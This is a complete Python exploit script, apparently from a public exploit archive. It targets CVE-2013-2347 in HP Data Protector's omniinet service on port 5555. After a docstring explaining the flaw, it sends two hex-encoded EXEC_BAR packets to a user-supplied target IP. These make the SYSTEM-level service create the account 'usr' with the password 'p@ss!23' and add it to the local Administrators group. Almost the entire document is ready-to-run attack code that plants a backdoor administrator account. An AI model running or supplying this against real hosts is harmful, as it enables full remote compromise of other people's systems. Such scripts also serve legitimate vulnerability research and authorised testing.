import argparse import socket """ Exploit Title: HP Data Protector EXEC_BAR Remote Command Execution Exploit Author: Chris Graham @cgrahamseven CVE: CVE-2013-2347 Date: February 14, 2014 Vendor Homepage: www.hp.com Version: 6.10, 6.11, 6.20 Tested On: Windows Server 2003, Windows Server 2008 R2 References: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422 http://www.zerodayinitiative.com/advisories/ZDI-14-008/ Details: The omniinet service, which runs by default on port 5555, is susceptible to numerous remotely exploitable vulnerabilities. By sending a malicious EXEC_BAR packet (opcode 11), a remote attacker can force the omniinet service to run an arbitrary command. On Windows, the omniinet service is running as SYSTEM. This allows for complete compromise of the remote host. To exploit this vulnerability, you only need to send two specific arguments. Omniinet has an argument parser that will extract these out and eventually pass them to a call to CreateProcessW via the lpCommandLine parameter. When a packet is sent to the omniinet service, it will check the opcode and look up an associated function to call based on the opcode in a table of function pointers. The function to handle EXEC_BAR packets requires that the packet contain at least 19 arguments. The 18th argument will be the command we want to execute, and the 19th will be an argument we can pass to the command we are executing. This exploit will create a new windows account and add it to the local Administrators group. This means that lpCommandLine that gets passed to CreateProcess will need to look like: 'c:\windows\system32\cmd.exe' '/c net user usr p@ss!23 /add' and 'c:\windows\system32\cmd.exe' '/c net localgroup Administrators usr /add' Note: The 19th value has size constraints so it needs to be as short of a string as possible. """ exec_bar_add_user = \ "\x00\x00\x01\x3c\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00" + \ "\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00" + \ "\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00" + \ "\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00" + \ "\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00" + \ "\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \ "\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \ "\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \ "\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \ "\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \ "\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \ "\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \ "\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00" + \ "\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00" + \ "\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00" + \ "\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00" + \ "\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00" + \ "\x20\x00\x75\x00\x73\x00\x65\x00\x72\x00\x20\x00\x75\x00\x73\x00" + \ "\x72\x00\x20\x00\x70\x00\x40\x00\x73\x00\x73\x00\x21\x00\x32\x00" + \ "\x33\x00\x20\x00\x2f\x00\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00" exec_bar_make_admin = \ "\x00\x00\x01\x56\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00" + \ "\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00" + \ "\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00" + \ "\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00" + \ "\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00" + \ "\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \ "\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \ "\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \ "\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \ "\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \ "\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \ "\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \ "\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00" + \ "\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00" + \ "\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00" + \ "\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00" + \ "\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00" + \ "\x20\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x67\x00\x72\x00" + \ "\x6f\x00\x75\x00\x70\x00\x20\x00\x41\x00\x64\x00\x6d\x00\x69\x00" + \ "\x6e\x00\x69\x00\x73\x00\x74\x00\x72\x00\x61\x00\x74\x00\x6f\x00" + \ "\x72\x00\x73\x00\x20\x00\x75\x00\x73\x00\x72\x00\x20\x00\x2f\x00" + \ "\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00" def connect_target(target, port): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) except socket.error as err: print "[-]ERROR CREATING SOCKET! CODE: %d MSG: %s" % (err[0], err[1]) return -1 try: sock.connect((target, port)) except socket.error as err: print "[-]ERROR CONNECTING TO TARGET! CODE: %d MSG: %s" % (err[0], err[1]) return -1 return sock def send_recv_packet(sock, packet): sock.sendall(packet) res = sock.recv(4096) return res cmdline_parser = argparse.ArgumentParser(description='HP Data Protector EXEC_BAR Remote Command Execution') cmdline_parser.add_argument('-t', dest='ip', help='Target host ip', required=True) cmdline_parser.add_argument('-p', dest='port', help='Target port', default=5555, type=int, required=False) args = cmdline_parser.parse_args() print "\n[*]ATTEMPING TO ADD WINDOWS ADMINISTRATOR ACCOUNT usr WITH PASSWORD p@ss!23" for packet in [exec_bar_add_user, exec_bar_make_admin]: target = connect_target(args.ip, args.port) if target == -1: exit() data = send_recv_packet(target, packet) print "[*]SERVER RESPONSE: " + \ data.split("\xFF\xFE\x31\x00\x35\x00\x00\x00\x20\x00")[1].lstrip("\x07\x00\x01\x00").rstrip("$") target.close()